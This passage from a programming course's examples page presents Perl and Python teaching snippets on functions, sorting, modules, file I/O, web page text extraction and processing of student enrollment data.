foreach $course (@ARGV) {
    %n_taking = ();
    $n_students = 0;
    foreach $upi (keys %course) {
        @courses = @{$course{$upi}};
        next if !grep(/$course/, @courses);
        foreach $c (@courses) {
            $n_taking{$c}++;
        }
        $n_students++;
    }
    foreach $c (sort {$n_taking{$a} <=> $n_taking{$b}} keys %n_taking) {
        printf "%5.1f%% of %s students take %s %s\n",
            100*$n_taking{$c}/$n_students, $course, $c, $course_name{$c};
    }
}

Perl Functions: lecture slides, lecture notes


This shows a bug due to a missing my declaration

In this case the use of $i in is_prime without a my declaration changes $i outside the function and breaks the while loop calling the function

sub is_prime {
	my ($n) = @_;
	$i = 2;    # the bug: without my this is the same $i as the caller's
	while ($i < $n) {
		return 0 if $n % $i == 0;
		$i++;
	}
	return 1;
}

$i = 0;
while ($i < 1000) {
	print "$i\n" if is_prime($i);
	$i++;
}
		

3 different ways to sum a list - illustrating various aspects of Perl

simple for loop

sub sum_list0 {
    my (@list) = @_;
    my $total = 0;
    foreach $element (@list) {
       $total += $element;
    }
    return $total;
}

# recursive
sub sum_list1 {
    my (@list) = @_;
    return 0 if !@list;
    return $list[0] + sum_list1(@list[1..$#list]);
}

# join+eval - interesting but not recommended
sub sum_list2 {
    my (@list) = @_;
    return eval(join("+", @list))
}

print sum_list0(1..10), " ", sum_list1(1..10), " ", sum_list2(1..10),  "\n";

implementations of Perl's split & join

sub my_join {
    my ($separator, @list) = @_;
    return "" if !@list;
    my $string = shift @list;
    foreach $thing (@list) {
        $string .= $separator . $thing;
    }
    return $string;
}

sub my_split1 {
    my ($regexp, $string) = @_;
    my @list = ();
    while ($string =~ /(.*)$regexp(.*)/) {
        unshift @list, $2;
        $string = $1;
    }
    unshift @list, $string;
    return @list;
}

sub my_split2 {
    my ($regexp, $string) = @_;
    my @list = ();
    while ($string =~ s/(.*?)$regexp//) {
        push @list, $1;
    }
    push @list, $string;
    return @list;
}

$a = my_join("+", 1, 2);
print "$a = ", eval $a, "\n";
@a = my_split1(",", "1,2,3,4,5,6,7,8,10");
print "@a\n";
@a = my_split2(",", "1,2,3,4,5,6,7,8,10");
print "@a\n";

8 different ways to print the odd numbers in a list - illustrating various aspects of Perl

simple for loop

sub print_odd0 {
    my (@list) = @_;
    foreach $element (@list) {
        print "$element\n" if $element % 2;
    }
}

# simple for loop using index
sub print_odd1 {
    my (@list) = @_;
    foreach $i (0..$#list) {
        print "$list[$i]\n" if $list[$i] % 2;
    }
}

# set $_ in turn to each item in list
# evaluate supplied expression
# print item if the expression evaluates to true
sub print_list0 {
    my ($select_expression, @list) = @_;
    foreach $_ (@list) {
        print "$_\n" if &$select_expression;
    }
}

# calling helper function which prints
# items selected by an expression
sub print_odd2 {
    print_list0(sub {$_ % 2}, @_);
}

sub odd {
    return $_[0] % 2;
}

# more concise version of print_list0
sub print_list1 {
   &{$_[0]} && print "$_\n" foreach @_[1..$#_];
}

# calling helper function which prints
# items selected by an expression
sub print_odd3 {
    print_list1(sub {odd $_}, @_);
}

# set $_ in turn to each item in list
# evaluate supplied expression
# return a list of items for which the expression evaluated to true
sub my_grep0 {
    my $select_expression = $_[0];
    my @matching_elements;
    foreach $_ (@_[1..$#_]) {
        push @matching_elements, $_ if &$select_expression;
    }
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd4 {
    foreach $x (my_grep0 sub {$_ % 2}, @_) {
        print "$x\n";
    }
}


# more concise version of my_grep0
sub my_grep1 {
    my $select_expression = shift;
    my @matching_elements;
    &$select_expression && push @matching_elements, $_ foreach @_;
    return @matching_elements;
}

# calling helper function which returns
# list items selected by an expression
sub print_odd5 {
    # parentheses are needed: odd $_ && ... would parse as odd($_ && ...)
    my_grep1 sub {odd($_) && print "$_\n"}, @_;
}

# using built-in grep and combining print
sub print_odd6 {
    grep {$_ % 2 && print "$_\n"} @_;
}

# using built-in grep and join
sub print_odd7 {
    print join("\n", grep {$_ % 2} @_), "\n";
}


@a = (1..10);
foreach $version (0..7) {
    print "print_odd$version\n";
    &{"print_odd$version"}(@a);
}

implementations of Perl's push

sub mypush1 {
    my ($array_ref,@elements) = @_;
    if (@elements) {
        @$array_ref = (@$array_ref, @elements);
    } else {
        @$array_ref = (@$array_ref, $_);
    }
}
# same but with prototype
sub mypush2(\@@) {
    my ($array_ref,@elements) = @_;
    if (@elements) {
        @$array_ref = (@$array_ref, @elements);
    } else {
        @$array_ref = (@$array_ref, $_);
    }
}

@a = (1..10);
mypush1 \@a, 11..20;
mypush2 @a, 21..30;
print "@a\n";

%days = (Sunday => 0, Monday => 1, Tuesday => 2, Wednesday => 3,
         Thursday => 4, Friday => 5, Saturday => 6);

sub random_day {
    my @days = keys %days;
    return $days[rand @days];
}

sub compare_day {
    return $days{$a} <=> $days{$b};
}

push @random_days, random_day() foreach 1..5;
print "random_days=@random_days\n";
@sorted_days = sort compare_day @random_days;
print "sorted days=@sorted_days\n";

sub random_date {
    return sprintf "%02d/%02d/%04d", 1 + rand 28, 1 + rand 12, 2000+rand 20
}

sub compare_date {
    my ($day1,$month1,$year1) = split /\D+/, $a;
    my ($day2,$month2,$year2) = split /\D+/, $b;
    return $year1 <=> $year2 || $month1 <=> $month2 || $day1 <=> $day2;
}

push @random_dates, random_date() foreach 1..5;
print "random_dates=@random_dates\n";
@sorted_dates = sort compare_date @random_dates;
print "sorted dates=@sorted_dates\n";

print a HTML times table

Note html_times_table has 6 parameters; calls to the function are hard to read and it's easy to introduce errors.

sub html_times_table {
    my ($min_x, $max_x, $min_y, $max_y, $bgcolor, $border) = @_;
    my $html = "<table border=$border bgcolor=$bgcolor>\n";
    foreach $y ($min_y..$max_y) {
        $html .= "<tr>";
        foreach $x ($min_x..$max_x) {
            $html .= sprintf "<td align=right>%s</td>", $x * $y;
        }
        $html .=  "</tr>\n";
    }
    $html .=  "</table>\n";
    return $html;
}

print html_times_table(1, 12, 1, 12, "pink", 1);

print a HTML times table

Note use of a hash to pass named parameters

sub html_times_table {
    my %parameters = @_;
    my $html = "<table border=$parameters{border} bgcolor=$parameters{bgcolor}>\n";
    foreach $y ($parameters{min_y}..$parameters{max_y}) {
        $html .= "<tr>";
        foreach $x ($parameters{min_x}..$parameters{max_x}) {
            $html .= sprintf "<td align=right>%s</td>", $x * $y;
        }
        $html .=  "</tr>\n";
    }
    $html .=  "</table>\n";
    return $html;
}

print html_times_table(bgcolor=>'pink', min_y=>1, max_y=>12, border=>1, min_x=>1, max_x=>12);

print a HTML times table

Note use of a hash to pass named parameters combined with a hash to provide default values for parameters

sub html_times_table {
    my %defaults = (min_x=>1, max_x=>10, min_y=>1, max_y=>10, bgcolor=>'white', border=>0);
    my %arguments = @_;
    my %parameters = (%defaults,%arguments);
    my $html = "<table border=$parameters{border} bgcolor=$parameters{bgcolor}>\n";
    foreach $y ($parameters{min_y}..$parameters{max_y}) {
        $html .= "<tr>";
        foreach $x ($parameters{min_x}..$parameters{max_x}) {
            $html .= sprintf "<td align=right>%s</td>", $x * $y;
        }
        $html .=  "</tr>\n";
    }
    $html .=  "</table>\n";
    return $html;
}

print html_times_table(max_y=>12, max_x=>12, bgcolor=>'pink');

@list = randomize_list(1..20);
print "@list\n";
@sorted_list0 = sort {$a <=> $b} @list;
print "@sorted_list0\n";
@sorted_list1 = quicksort0(@list);
print "@sorted_list1\n";
@sorted_list2 = quicksort1(sub {$a <=> $b}, @list);
print "@sorted_list2\n";

sub quicksort0 {
    return @_ if @_ < 2;
    my ($pivot,@numbers) = @_;
    my @less = grep {$_ < $pivot} @numbers;
    my @more = grep {$_ >= $pivot} @numbers;
    my @sorted_less = quicksort0(@less);
    my @sorted_more = quicksort0(@more);
    return (@sorted_less, $pivot, @sorted_more);
}


sub quicksort1 {
    my ($compare) = shift @_;
    return @_ if @_ < 2;
    my ($pivot, @input) = @_;
    my (@less, @more);
    partition1($compare, $pivot, \@input, \@less, \@more);
    my @sorted_less = quicksort1($compare, @less);
    my @sorted_more = quicksort1($compare, @more);
    my @r = (@sorted_less, $pivot, @sorted_more);
    return (@sorted_less, $pivot, @sorted_more);
}

sub partition1 {
    my ($compare, $pivot, $input, $smaller, $larger) = @_;
    foreach $x (@$input) {
        our $a = $x;
        our $b = $pivot;
        if (&$compare  < 0) {
            push @$smaller, $x;
        } else {
            push @$larger, $x;
        }
    }
}

sub randomize_list {
    my @newlist;
    while (@_) {
        my $random_index = rand @_;
        my $r = splice @_,  $random_index, 1;
        push @newlist, $r;
    }
    return @newlist;
}
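
The Perl comparison sub above reads the package variables $a and $b. As a rough Python 3 sketch of the same technique, a quicksort can take a comparison function with explicit arguments instead. The names quicksort and compare here are illustrative only.

```python
def quicksort(compare, items):
    """Sort items using compare(a, b), which is negative when a belongs before b."""
    if len(items) < 2:
        return list(items)
    pivot, rest = items[0], items[1:]
    # partition the remaining elements around the pivot
    less = [x for x in rest if compare(x, pivot) < 0]
    more = [x for x in rest if compare(x, pivot) >= 0]
    return quicksort(compare, less) + [pivot] + quicksort(compare, more)

numbers = [5, 3, 8, 1, 9, 2]
print(quicksort(lambda a, b: a - b, numbers))   # ascending order
print(quicksort(lambda a, b: b - a, numbers))   # descending order
```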

sub quicksort0(@);
sub quicksort1(&@);
sub partition1(&$\@\@\@);
sub randomize_list(@);

@list = randomize_list 1..20;
print "@list\n";
@sorted_list0 = sort {$a <=> $b} @list;
print "@sorted_list0\n";
@sorted_list1 = quicksort0 @list;
print "@sorted_list1\n";
@sorted_list2 = quicksort1 {$a <=> $b} @list;
print "@sorted_list2\n";

sub quicksort0(@) {
    return @_ if @_ < 2;
    my ($pivot,@numbers) = @_;
    my @less = grep {$_ < $pivot} @numbers;
    my @more = grep {$_ >= $pivot} @numbers;
    my @sorted_less = quicksort0 @less;
    my @sorted_more = quicksort0 @more;
    return (@sorted_less, $pivot, @sorted_more);
}


sub quicksort1(&@) {
    my ($compare) = shift @_;
    return @_ if @_ < 2;
    my ($pivot, @input) = @_;
    my (@less, @more);
    partition1 \&$compare, $pivot, @input, @less, @more;
    my @sorted_less = quicksort1 \&$compare, @less;
    my @sorted_more = quicksort1 \&$compare, @more;
    my @r = (@sorted_less, $pivot, @sorted_more);
    return (@sorted_less, $pivot, @sorted_more);
}

sub partition1(&$\@\@\@) {
    my ($compare, $pivot, $input, $smaller, $larger) = @_;
    foreach $x (@$input) {
        our $a = $x;
        our $b = $pivot;
        if (&$compare  < 0) {
            push @$smaller, $x;
        } else {
            push @$larger, $x;
        }
    }
}

sub randomize_list(@) {
    my @newlist;
    while (@_) {
        my $random_index = rand @_;
        my $r = splice @_,  $random_index, 1;
        push @newlist, $r;
    }
    return @newlist;
}

rename specified files using specified Perl code

For each file the Perl code is executed with $_ set to the filename and the file is renamed to the value of $_ after the execution. /usr/bin/rename provides this functionality

die "Usage: $0 <perl> [files]\n" if !@ARGV;
$perl_code = shift @ARGV;
foreach $filename (@ARGV) {
    $_ = $filename;
    eval $perl_code;
    die "$0: $@" if $@; # eval leaves any error message in $@
    $new_filename = $_;
    next if $filename eq $new_filename;
    -e $new_filename and die "$0: $new_filename exists already\n";
    rename $filename, $new_filename or die "$0: rename $filename -> $new_filename failed: $!\n";
}

package Example_Module;
# written by andrewt@cse.unsw.edu.au for COMP2041 
# 
# Definition of a simple Perl module.
#
# List::Util provides the functions below and more

use base 'Exporter';
our @EXPORT = qw/sum min max minstr maxstr/;
use List::Util qw/reduce/;


sub sum {
	return reduce {$a + $b} @_;
}

sub min {
	return reduce {$a < $b ? $a : $b} @_;
}

sub max {
	return reduce {$a > $b ? $a : $b} @_;
}

sub minstr {
	return reduce {$a lt $b ? $a : $b} @_;
}

sub maxstr {
	return reduce {$a gt $b ? $a : $b} @_;
}

# necessary
1;

Use of a simple Perl module.

use Example_Module qw/max/;

# As max is specified in our import list it can be used without the package name
print max(42,3,5), "\n";

# We don't import min explicitly so it needs the package name
print Example_Module::min(42,3,5), "\n";

Python: lecture slides, lecture notes
Evan's: Python slides, Advanced Python slides, Port Forwarding Tutorial, Flask Tutorial Video
External resources: python.org tutorial, Perl-->Python, recipes, Crash into Python, Google tutorial, Quick Guide The hard way


compute Pythagoras' Theorem

Works with any Python version but prints a newline after each of the 2 prompts

import math, sys

print("Enter x:")
x = float(sys.stdin.readline())
print("Enter y:")
y = float(sys.stdin.readline())
pythagoras = math.sqrt(x * x + y * y)
print("The square root of %f squared + %f squared is %f" % (x, y, pythagoras))

compute Pythagoras' Theorem

Works with Python 3.3+

import math, sys

print("Enter x: ", end='', flush=True)
x = float(sys.stdin.readline())
print("Enter y: ", end='', flush=True)
y = float(sys.stdin.readline())
pythagoras = math.sqrt(x * x + y * y)
print("The square root of %f squared + %f squared is %f" % (x, y, pythagoras))

compute Pythagoras' Theorem

Works with any Python version

import math, sys

sys.stdout.write("Enter x: ")
sys.stdout.flush()
x = float(sys.stdin.readline())
sys.stdout.write("Enter y: ")
sys.stdout.flush()
y = float(sys.stdin.readline())
pythagoras = math.sqrt(x * x + y * y)
print("The square root of %f squared + %f squared is %f" % (x, y, pythagoras))

Read numbers until end of input (or a non-number) is reached, then print the sum of the numbers

import re, sys

sum = 0

while 1:
    line = sys.stdin.readline()
    line = line.strip() # remove leading & trailing white space
    # Test if string looks like an integer or real (scientific notation not handled!)
    if not re.search(r'^\d[.\d]*$', line):
        break
    sum += float(line)

print("Sum of the numbers is %s" % sum)
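
The pattern ^\d[.\d]*$ also accepts strings such as 1.2.3, which float() then rejects with a ValueError. One alternative, sketched here on the assumption that stopping at the first unparsable line is the desired behaviour, is to let float() do the validation. The function name sum_numbers is hypothetical, and note that float() also accepts scientific notation and values such as inf.

```python
import re

def sum_numbers(lines):
    """Add up leading numeric lines, stopping at the first line float() cannot parse."""
    total = 0.0
    for line in lines:
        try:
            total += float(line.strip())
        except ValueError:
            break
    return total

# the regex from the example accepts this string, but float() does not
print(bool(re.search(r'^\d[.\d]*$', '1.2.3')))
print(sum_numbers(["1\n", "2.5\n", "1.2.3\n", "4\n"]))
```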

Simple example reading a line of input and examining characters

import sys

sys.stdout.write("Enter some input: ")
line = sys.stdin.readline()
if not line:
    sys.stdout.write("%s: could not read any characters\n" % sys.argv[0])
line = line.rstrip('\n')
n_chars = len(line)
print("That line contained %s characters" % n_chars)
if n_chars > 0:
    first_char = line[0]
    last_char = line[-1]
    print("The first character was '%s'" % first_char)
    print("The last character was '%s'" % last_char)

create a string of size 2^n by concatenation
import sys
if len(sys.argv) != 2:
    sys.stderr.write("Usage: %s <n>\n" % sys.argv[0])
    sys.exit(1)
n = 0
string = '@'
while  n  < int(sys.argv[1]):
    string =  string + string
    n += 1
print("String of 2^%d = %d characters created\n" % (n, len(string)));

Python implementation of /bin/echo

Note this prints an extra space on the end of the line

from __future__ import print_function  # Python 2.6+ compatibility

import sys

for arg in sys.argv[1:]:
    print(arg, end=' ')
print()

Python implementation of /bin/echo

Clumsy but works with any Python version

import sys

if len(sys.argv) > 1:
    sys.stdout.write(sys.argv[1])
for arg in sys.argv[2:]:
    sys.stdout.write(' ' + arg)
print()

Python implementation of /bin/echo

from __future__ import print_function # Python 2.6+ compatibility

import sys

if len(sys.argv) > 1:
    print(sys.argv[1], end='')
for arg in sys.argv[2:]:
    print(' ' + arg, end='')
print()

Python implementation of /bin/echo

import sys

print(' '.join(sys.argv[1:]))

sum integers supplied as command line arguments; no check that arguments are integers

import sys

sum = 0
for arg in sys.argv[1:]:
    sum += int(arg)
print("Sum of the numbers is %s" % sum)


Count the number of lines on standard input.

import sys

line_count = 0
for line in sys.stdin:
    line_count += 1
print("%d lines" % line_count)

Count the number of lines on standard input.

import sys

lines = sys.stdin.readlines()
line_count = len(lines)
print("%d lines" % line_count)

Count the number of lines on standard input.

import sys

print("%d lines" % len(list(sys.stdin)))

Simple cp implementation using line by line I/O

import sys,os
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    # or (Python3 only):
    # print("Usage:",  sys.argv[0], "<infile> <outfile>", file=sys.stderr)
    sys.exit(1)
outfile = open(sys.argv[2], 'w')
for line in open(sys.argv[1]):
    outfile.write(line)

Simple cp implementation using line by line I/O and with statement

import sys,os
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    sys.exit(1)
with open(sys.argv[1]) as infile:
    with open(sys.argv[2], 'w') as outfile:
        for line in infile:
            outfile.write(line)

Simple cp implementation reading file into a list

import sys
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    sys.exit(1)
lines = open(sys.argv[1]).readlines()
open(sys.argv[2], 'w').writelines(lines)

Simple cp implementation using line by line I/O

import sys,os
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    sys.exit(1)
open(sys.argv[2], 'w').writelines(open(sys.argv[1]))

Simple cp implementation using shutil.copyfile

import sys,shutil
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    sys.exit(1)
shutil.copyfile(sys.argv[1], sys.argv[2])

Simple cp implementation by running /bin/cp

import sys,subprocess
if len(sys.argv) != 3:
    sys.stderr.write("Usage: %s <infile> <outfile>\n" % sys.argv[0])
    sys.exit(1)
subprocess.call(['cp', sys.argv[1], sys.argv[2]])
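
The line-by-line versions above open files in text mode, which in Python 3 decodes the bytes and can fail on files that are not valid text. A minimal sketch of a copy that treats the file as raw bytes follows; the function name copy_file and the chunk size are arbitrary choices for illustration.

```python
import os, tempfile

def copy_file(src, dst, chunk_size=64 * 1024):
    """Copy src to dst in fixed-size binary chunks."""
    with open(src, 'rb') as infile, open(dst, 'wb') as outfile:
        while True:
            chunk = infile.read(chunk_size)
            if not chunk:
                break
            outfile.write(chunk)

# small self-check using files in a temporary directory
tmpdir = tempfile.mkdtemp()
src = os.path.join(tmpdir, 'in.bin')
dst = os.path.join(tmpdir, 'out.bin')
with open(src, 'wb') as f:
    f.write(bytes(range(256)) * 10)
copy_file(src, dst, chunk_size=100)
with open(dst, 'rb') as f:
    print(len(f.read()), "bytes copied")
```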

fetch a web page, remove HTML tags, character entities, and the text inside script and style elements, then print non-empty lines.

There are python libraries which provide a better way to fetch web pages

subprocess.check_output was introduced in Python 2.7.

In older Python versions you might use: webpage = subprocess.Popen(["wget","-q","-O-",url], stdout=subprocess.PIPE).communicate()[0]

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

import sys, re, subprocess
for url in sys.argv[1:]:
    webpage = subprocess.check_output(["wget", "-q", "-O-", url], universal_newlines=True)
    webpage = re.sub(r'(?i)<script>.*?</script>', '', webpage)
    webpage = re.sub(r'(?i)<style>.*?</style>', '', webpage)
    webpage = re.sub(r'&\w+;', ' ', webpage)
    webpage = re.sub(r'<[^>]*>', '', webpage)
    webpage = re.sub(r'\n\s*\n', '\n', webpage)
    sys.stdout.write(webpage)

fetch a web page, remove HTML tags and character entities, and print non-empty lines

The regex code below doesn't handle a number of cases. It is often better to use a library to properly parse HTML before processing it.

But beware illegal HTML is common & often causes problems for parsers.

import re, sys

# urllib package names changed in Python 3
try:
    from urllib import urlopen # Python 2
except ImportError:
    from urllib.request import urlopen # Python 3

for url in sys.argv[1:]:
    response = urlopen(url)
    webpage = response.read().decode()
    webpage = re.sub(r'(?i)<script>.*?</script>', '', webpage)
    webpage = re.sub(r'(?i)<style>.*?</style>', '', webpage)
    webpage = re.sub(r'&\w+;', ' ', webpage)
    webpage = re.sub(r'<[^>]*>', '', webpage)
    webpage = re.sub(r'\n\s*\n', '\n', webpage)
    sys.stdout.write(webpage)
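
Two of the cases the regexes above miss are script or style elements that span several lines and opening tags that carry attributes. A hedged sketch of one way to cover those two cases is shown below (Python 3; the function name strip_html and the sample string are made up for illustration). It is still no substitute for a real HTML parser.

```python
import re

def strip_html(webpage):
    """Roughly reduce HTML to text; still not a substitute for a real parser."""
    # re.S lets . match newlines; [^>]* tolerates attributes in the opening tag
    webpage = re.sub(r'<script[^>]*>.*?</script>', '', webpage, flags=re.I | re.S)
    webpage = re.sub(r'<style[^>]*>.*?</style>', '', webpage, flags=re.I | re.S)
    webpage = re.sub(r'&\w+;', ' ', webpage)
    webpage = re.sub(r'<[^>]*>', '', webpage)
    webpage = re.sub(r'\n\s*\n', '\n', webpage)
    return webpage

sample = '<p>Hello</p>\n<script type="text/javascript">\nvar x = 1;\n</script>\n<p>World</p>\n'
print(strip_html(sample))
```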

fetch a web page, remove HTML tags and character entities using the HTML parser BeautifulSoup, and print non-empty lines

import re, sys
from urllib import urlopen
import BeautifulSoup

# on Python 3 instead do
# from urllib.request import urlopen # Python 3
# import bs4 as BeautifulSoup
# and change BeautifulSoup(webpage) to BeautifulSoup(webpage, "lxml")

def traverse(html):
    if isinstance(html, BeautifulSoup.Tag):
        if html.name in ['style', 'script']:
            return ""
        else:
            return traverse(html.contents)
    elif isinstance(html, list):
        return "".join([traverse(h) for h in html])
    else:
        return html

for url in sys.argv[1:]:
    webpage = urlopen(url).read().decode()
    soup = BeautifulSoup.BeautifulSoup(webpage)
    text = traverse(soup)
    text = re.sub(r'\n\s*\n', '\n', text)
    sys.stdout.write(text)

Reads lines of input until end-of-input

Print snap! if a line has been seen previously

import sys
seen = {}
while 1:
    sys.stdout.write("Enter line: ")
    sys.stdout.flush()
    line = sys.stdin.readline()
    if not line:
        break
    if line in seen:
        print("Snap!")
    seen[line] = 1

count how many people enrolled in each course

import fileinput, re

course_names = {}
for line in open("course_codes"):
    m = re.match(r'(\S+)\s+(.*\S)', line)
    if m:
        course_names[m.group(1)] = m.group(2);

count = {}
for line in fileinput.input():
    course = re.sub(r'\|.*\n', '', line)
    if course in count:
        count[course] += 1
    else:
        count[course] = 1

for course in sorted(count.keys()):
    print("%s has %s students enrolled"%(course_names[course], count[course]))
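
The if/else counting idiom above can also be written with collections.Counter from the standard library. This is a small sketch: the function name count_enrollments is hypothetical, and the sample records are invented, following the course|student number|name layout that the examples appear to assume.

```python
from collections import Counter

def count_enrollments(lines):
    """Count lines per course code, taking the code to be the text before the first '|'."""
    return Counter(line.split('|', 1)[0] for line in lines)

# invented records, not taken from the real enrollments file
sample = [
    "COMP2041|1111111|Student, Alice\n",
    "COMP2041|2222222|Student, Bob\n",
    "COMP9041|2222222|Student, Bob\n",
]
for course, n in sorted(count_enrollments(sample).items()):
    print("%s has %s students enrolled" % (course, n))
```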

run as count_first_names.py enrollments; count how many people enrolled have each first name

import fileinput, re

already_counted = {}
fn = {}
for line in fileinput.input():
    fields = line.split('|')
    student_number = fields[1]
    if student_number in already_counted:
        continue
    already_counted[student_number] = 1
    full_name = fields[2]
    m = re.match(r'.*,\s+(\S+)', full_name)
    if m:
        first_name = m.group(1)
        if first_name in fn:
            fn[first_name] += 1
        else:
            fn[first_name] = 1

for first_name in sorted(fn.keys()):
    print("There are %2d people with the first name %s"%(fn[first_name], first_name))

for each course specified as an argument, print a summary of the other courses taken by students in this course

import sys,re

if len(sys.argv) < 3:
    sys.stderr.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    # or (Python3 only):
    # print("Usage:",  sys.argv[0], "<enrollment_file> <course_codes>", file=sys.stderr)
    sys.exit(1)
enrollment_file = sys.argv.pop(1)

course_names = {}
for line in open("course_codes"):
    line = line.rstrip()
    code = line[0:8]
    name = line[9:]
    course_names[code] = name

courses = {}
names = {}
for line in open(enrollment_file):
    (course,upi,name) = line.split("|")[0:3]
    m = re.match(r'(.*),\s+(.*\S)', name)
    if m:
        name = m.group(2) + " " + m.group(1)
    if upi in courses:
        courses[upi].append(course)
    else:
        courses[upi] = [course]
    names[upi] = name.rstrip()


for course in sys.argv[1:]:
    n_taking = {}
    n_students = 0
    for upi in list(courses.keys()):
        if course not in courses[upi]:
            continue
        n_students += 1
        for c in courses[upi]:
            if c in n_taking:
                n_taking[c] += 1
            else:
                n_taking[c] = 1
    for c in sorted(list(n_taking.keys()), key=lambda x: n_taking[x]):
        print("%5.1f%% of %s students take %s %s"%(100.0*n_taking[c]/n_students, course, c, course_names[c]))

run as duplicate_first_names.py /home/cs2041/public_html/11s2/lec/perl/examples/enrollments

Report cases where there are multiple people with the same first name enrolled in a course

import fileinput, re

cfn = {}
for line in fileinput.input():
    fields = line.split('|')
    course = fields[0]
    full_name = fields[2]
    m = re.match(r'.*,\s+(\S+)', full_name)
    if not m:
        continue
    first_name = m.group(1)
    if course not in cfn:
        cfn[course] = {}
    if first_name in cfn[course]:
        cfn[course][first_name] += 1
    else:
        cfn[course][first_name] = 1

for course in sorted(cfn.keys()):
    for first_name in sorted(cfn[course].keys()):
        n = cfn[course][first_name]
        if n > 1:
            print("In %s there are %d people with the first name %s"%(course, n, first_name))

For each file given as argument replace occurrences of Hermione allowing for some misspellings with Harry and vice-versa.

Relies on Zaphod not occurring in the text.

import re, sys,os
for filename in sys.argv[1:]:
    tmp_filename = filename + '.new'
    if os.path.exists(tmp_filename):
        sys.stderr.write("%s: %s already exists\n" % (sys.argv[0], tmp_filename))
        sys.exit(1)
    with open(filename) as f:
        with open(tmp_filename, 'w') as g:
            for line in f:
                line = re.sub(r'Herm[io]+ne', 'Zaphod', line)
                line = line.replace('Harry', 'Hermione')
                line = line.replace('Zaphod', 'Harry')
                g.write(line)
    os.rename(tmp_filename, filename)
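
The placeholder approach above depends on Zaphod never appearing in the text. One way to avoid the placeholder, sketched here in Python 3 with a hypothetical function name swap_names, is to match both names in a single pass and pick the replacement with a function.

```python
import re

def swap_names(line):
    """Swap Hermione (and the misspellings matched by Herm[io]+ne) with Harry in one pass."""
    def replacement(match):
        # each match is replaced exactly once, so no placeholder word is needed
        return 'Hermione' if match.group(0) == 'Harry' else 'Harry'
    return re.sub(r'Herm[io]+ne|Harry', replacement, line)

print(swap_names("Harry and Hermoine met Hermione"))
```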

print the courses being taken by each student enrolled in the specified courses

import sys,re
if len(sys.argv) < 3:
    sys.stderr.write("Usage: %s <enrollment_file> <course_codes>\n" % sys.argv[0])
    sys.exit(1)
enrollment_file = sys.argv.pop(1)

course_names = {}
for line in open("course_codes"):
    line = line.rstrip()
    code = line[0:8]
    name = line[9:]
    course_names[code] = name

courses = {}
names = {}
for line in open(enrollment_file):
    (course,upi,name) = line.split("|")[0:3]
    m = re.match(r'(.*),\s+(.*\S)', name)
    if m:
        name = m.group(2) + " " + m.group(1)
    if upi in courses:
        courses[upi] += " " + course
    else:
        courses[upi] = course
    names[upi] = name.rstrip()


for course in sys.argv[1:]:
    for upi in list(courses.keys()):
        student_courses = courses[upi].split()
        if course not in student_courses:
            continue
        print("%s is taking"%(names[upi]))
        # use a separate name so the outer loop variable course is not overwritten
        for c in student_courses:
            print("%s %s"%(c, course_names[c]))

Print the nth word on every line of input files/stdin; output is piped through fmt to make reading easy

from __future__ import print_function # Python 2.6+ compatibility

import fileinput, sys, subprocess

if len(sys.argv) < 2:
    sys.stderr.write("Usage: %s <n>\n" % sys.argv[0])
    sys.exit(1)

nth_word = int(sys.argv.pop(1))
p = subprocess.Popen(["fmt","-w","40"], stdin=subprocess.PIPE, universal_newlines=True)
for line in fileinput.input():
    words = line.rstrip().split()
    if len(words) > nth_word:
        print(words[nth_word], file=p.stdin)
p.stdin.close()

5 different ways to print the odd numbers in a list - illustrating various aspects of Python

simple for loop

def print_odd0(list):
    for element in list:
        if element % 2 :
            print(element)

# list comprehension
def print_odd1(list):
    odd = [x for x in list if x % 2]
    for element in odd:
        print(element)

def odd(x):
    return x % 2

# filter+helper function
def print_odd2(list):
    for element in filter(odd, list):
        print(element)

# filter+lambda expression
def print_odd3(list):
    for element in filter(lambda x: x % 2, list):
        print(element)

# join+map+filter+helper function
def print_odd4(list):
    print("\n".join(map(str, filter(odd, list))))

a = list(range(1, 10))
for version in range(0, 5):
    print("print_odd%s"%version)
    eval("print_odd%s(a)"%version)

Reads lines of input until end-of-input

Print snap! if two consecutive lines are identical

import sys
sys.stdout.write("Enter line: ")
sys.stdout.flush()
last_line = sys.stdin.readline()
while 1:
    sys.stdout.write("Enter line: ")
    sys.stdout.flush()
    line = sys.stdin.readline()
    if not line:
        break
    if line == last_line:
        print("Snap!")
    last_line = line

import re
from random import randint

def random_date():
    return "%02d/%02d/%04d"%(randint(1,28), randint(1,12), randint(2000,2020))

def parse_date(date1):
    (day, month, year) = re.split(r'\D+', date1)
    return (year, month, day)

random_dates = [random_date() for x in range(0,5)]
print("random_dates: " + ','.join(random_dates))
sorted_dates = sorted(random_dates, key=parse_date)
print("sorted dates: " + ','.join(sorted_dates))
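
The (year, month, day) key above compares strings, which works here because random_date zero-pads every field. With unpadded input the string "12" would sort before "3". A sketch of a key that does not depend on padding, using datetime.strptime from the standard library, is shown below; the sample dates are invented.

```python
from datetime import datetime

def parse_date(date_string):
    """Convert a dd/mm/yyyy string into a datetime usable as a sort key."""
    return datetime.strptime(date_string, "%d/%m/%Y")

dates = ["17/12/2004", "9/3/2004", "05/11/2019"]
print(sorted(dates, key=parse_date))
```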

import random

days = {'Sunday':0, 'Monday':1, 'Tuesday':2, 'Wednesday':3,
         'Thursday':4, 'Friday':5, 'Saturday':6}

def random_day():
    return str(random.choice(list(days.keys())))

def day_number(day):
    return days[day]

random_days = [random_day() for x in range(0,5)]
print("random_days = " + ','.join(random_days))

sorted_days = sorted(random_days, key=day_number)
print("sorted_days = " + ','.join(sorted_days))

import random

day_names = "Sunday Monday Tuesday Wednesday Thursday Friday Saturday"
days = dict(list(zip(day_names.split(), list(range(0,7)))))

random_days = [random.choice(list(days.keys())) for x in range(0,5)]
print("random_days = " + ','.join(random_days))

sorted_days = sorted(random_days, key=lambda x:days[x])
print("sorted_days = " + ','.join(sorted_days))

Web: lecture slides, lecture notes


simple Perl TCP/IP server; access it with telnet localhost 4242

